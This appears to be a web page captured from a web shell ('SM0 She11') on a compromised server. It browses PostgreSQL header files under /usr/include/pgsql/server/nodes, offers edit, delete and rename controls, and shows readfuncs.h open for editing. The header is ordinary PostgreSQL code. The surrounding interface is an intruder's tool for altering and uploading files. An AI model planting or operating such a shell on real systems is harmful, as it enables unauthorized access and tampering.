SM0 She11
Path:
/
/
usr
/
include
/
pgsql
/
server
/
nodes
Full Path (server): /usr/include/pgsql/server/nodes
Create Fil3
Upl04d Fil3
📄 bitmapset.h
[E]
[D]
[R]
📄 execnodes.h
[E]
[D]
[R]
📄 makefuncs.h
[E]
[D]
[R]
📄 memnodes.h
[E]
[D]
[R]
📄 nodeFuncs.h
[E]
[D]
[R]
📄 nodes.h
[E]
[D]
[R]
📄 params.h
[E]
[D]
[R]
📄 parsenodes.h
[E]
[D]
[R]
📄 pg_list.h
[E]
[D]
[R]
📄 plannodes.h
[E]
[D]
[R]
📄 primnodes.h
[E]
[D]
[R]
📄 print.h
[E]
[D]
[R]
📄 readfuncs.h
[E]
[D]
[R]
📄 relation.h
[E]
[D]
[R]
📄 replnodes.h
[E]
[D]
[R]
📄 tidbitmap.h
[E]
[D]
[R]
📄 value.h
[E]
[D]
[R]
Editing: readfuncs.h
/*------------------------------------------------------------------------- * * readfuncs.h * header file for read.c and readfuncs.c. These functions are internal * to the stringToNode interface and should not be used by anyone else. * * Portions Copyright (c) 1996-2012, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * src/include/nodes/readfuncs.h * *------------------------------------------------------------------------- */ #ifndef READFUNCS_H #define READFUNCS_H #include "nodes/nodes.h" /* * prototypes for functions in read.c (the lisp token parser) */ extern char *pg_strtok(int *length); extern char *debackslash(char *token, int length); extern void *nodeRead(char *token, int tok_len); /* * prototypes for functions in readfuncs.c */ extern Node *parseNodeString(void); #endif /* READFUNCS_H */
Save